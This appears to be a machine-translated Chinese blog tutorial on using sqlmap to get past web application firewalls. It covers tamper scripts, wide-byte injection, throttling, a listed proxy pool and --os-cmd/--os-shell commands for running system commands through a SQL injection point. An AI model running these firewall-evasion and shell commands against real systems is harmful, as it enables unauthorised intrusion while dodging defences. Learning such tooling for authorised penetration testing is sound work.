当前位置:网站首页>Sqlmap tutorial (IV) practical skills three: bypass the firewall
Sqlmap tutorial (IV) practical skills three: bypass the firewall
2022-07-07 07:15:00 【A τθ】
At present, many websites use waf Protect the website , During the penetration test , Many operations will be blocked , In the test SQL When the injection ,waf It will intercept the requested traffic ,
Lead to SQLMAP The requested content cannot reach the destination ,SQLMAP It is impossible to judge whether the target has injection ,waf Intercept malicious attack requests , Interception will be blacklisted , Cause attackers
Unable to access the target . Unable to perform security detection .
One 、 see temper modular
sqlmap --list-tamper
Two 、 Wide byte Injection
sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user
3、 ... and 、 Set the thread size
In case of waf When , If the concurrency is too large , Think of it as cc attack ,ip Will be blocked .
--threads=1 Set the thread to 1
Four 、 Set up http Request delay
--delay=DELAY Set each HTTP Requested delay seconds .
5、 ... and 、 Use proxy injection
sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 --proxy=http://192.168.1.107:4455
6、 ... and 、 Use proxy pool injection
After purchasing the agent pool , Get the proxy and save it to a file , such as :proxy.txt
123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730
--proxy-file Load the agent list from the file .
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt
7、 ... and 、sqlmap Command execution
--os-cmd=OSCMD Execute operating system commands
--os-shell Call up the interactive operating system shell
The current user of the injection point is dba when , Use the above two commands , One is to execute commands , One is to call the interactive operating system shell
1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"
2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
Use --os-shell The command will pop up an interaction shell The interface of , You can enter commands , If it can echo, it will return the information of command execution .
边栏推荐
- 子组件传递给父组件
- 非父子组件的通信
- 异步组件和Suspense(真实开发中)
- 父组件传递给子组件:Props
- 虚拟机的作用
- Pass parent component to child component: props
- Non empty verification of collection in SQL
- Reflection (II)
- The currently released SKU (sales specification) information contains words that are suspected to have nothing to do with baby
- How can clothing stores make profits?
猜你喜欢
Complete process of MySQL SQL
RuntimeError: CUDA error: CUBLAS_ STATUS_ ALLOC_ Failed when calling `cublascreate (handle) `problem solving
AVL树的实现
Sword finger offer high quality code
Nesting and splitting of components
Bindingexception exception (error reporting) processing
Release notes of JMeter version 5.5
Config分布式配置中心
Answer to the second stage of the assignment of "information security management and evaluation" of the higher vocational group of the 2018 Jiangsu Vocational College skills competition
Precise space-time travel flow regulation system - ultra-high precision positioning system based on UWB
随机推荐
From zero to one, I will teach you to build the "clip search by text" search service (2): 5 minutes to realize the prototype
The startup of MySQL installed in RPM mode of Linux system failed
Readonly read only
Take you to brush (niuke.com) C language hundred questions (the first day)
MySQL view bin log and recover data
mips uclibc 交叉编译ffmpeg,支持 G711A 编解码
ViewModelProvider. Of obsolete solution
Le Service MySQL manque dans le service informatique
Nesting and splitting of components
Under what circumstances should we consider sub database and sub table
js小练习
"Xiaodeng in operation and maintenance" meets the compliance requirements of gdpr
Network foundation - header, encapsulation and unpacking
请问 flinksql对接cdc时 如何实现计算某个字段update前后的差异 ?
After the promotion, sales volume and flow are both. Is it really easy to relax?
Freeswitch dials extension number source code tracking
計算機服務中缺失MySQL服務
. Net 5 fluentftp connection FTP failure problem: this operation is only allowed using a successfully authenticated context
异步组件和Suspense(真实开发中)
Procedure in PostgreSQL supports transaction syntax (instance & Analysis)